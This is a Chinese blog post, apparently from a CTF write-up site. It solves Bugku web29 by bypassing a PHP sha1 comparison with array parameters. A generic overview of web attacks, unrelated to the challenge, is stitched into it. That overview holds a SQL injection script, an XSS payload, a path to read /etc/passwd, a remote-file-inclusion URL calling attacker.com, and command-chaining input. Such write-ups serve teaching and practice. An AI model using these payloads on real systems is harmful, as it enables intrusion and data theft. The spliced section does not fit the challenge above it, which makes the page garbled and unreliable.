bugku web29 各种绕过

题目:

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

分析:
sha和md5都是哈希函数,md5数组返回NULL,尝试一下sha可不可以这样操作

构造url?id=margin&uname[]=1,再post&passwd[]=2
在这里插入图片描述

由于没有具体的bugku平台web计算机题目,难以直接提供题解。不过一般来说,bugku平台的web题目涉及多种类型,以下是一些常见web漏洞类型题目的通用解题思路和示例代码说明。 ### SQL注入题解思路 SQL注入是通过构造恶意的SQL语句来绕过应用程序的验证,获取数据库中的信息。 #### 检测注入点 可以使用一些特殊字符,如单引号 `'`、双引号 `"` 等,观察页面返回的错误信息来判断是否存在注入点。 #### 利用注入漏洞获取信息 例如,使用联合查询(UNION)来获取数据库中的数据。 ```python import requests url = "http://example.com/search.php?id=1" # 构造注入语句,使用联合查询获取数据库名 payload = "' UNION SELECT 1, database(), 3 -- " new_url = url + payload response = requests.get(new_url) print(response.text) ``` ### XSS(跨站脚本攻击)题解思路 XSS攻击是通过在网页中注入恶意脚本,当用户访问该页面时,脚本会在用户的浏览器中执行。 #### 反射型XSS 在输入框中输入恶意脚本,观察页面是否将脚本原样输出并执行。 ```html <script>alert('XSS')</script> ``` #### 存储型XSS 将恶意脚本存储到网站的数据库中,当其他用户访问包含该脚本的页面时,脚本会执行。 ### 文件包含漏洞题解思路 文件包含漏洞是指应用程序在包含文件时,没有对用户输入的文件名进行严格的过滤,导致可以包含任意文件。 #### 本地文件包含(LFI) 构造包含本地文件的路径,如 `/etc/passwd`(在Linux系统中)。 ```plaintext http://example.com/index.php?file=../../../../etc/passwd ``` #### 远程文件包含(RFI) 如果应用程序支持远程文件包含,构造包含远程文件的URL。 ```plaintext http://example.com/index.php?file=http://attacker.com/malicious_file.php ``` ### 命令执行漏洞题解思路 命令执行漏洞是指应用程序在执行系统命令时,没有对用户输入的命令进行严格的过滤,导致可以执行任意系统命令。 #### 利用命令连接符执行命令 在输入框中输入命令连接符,如 `;`、`&&` 等,执行其他系统命令。 ```plaintext ls -la; ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值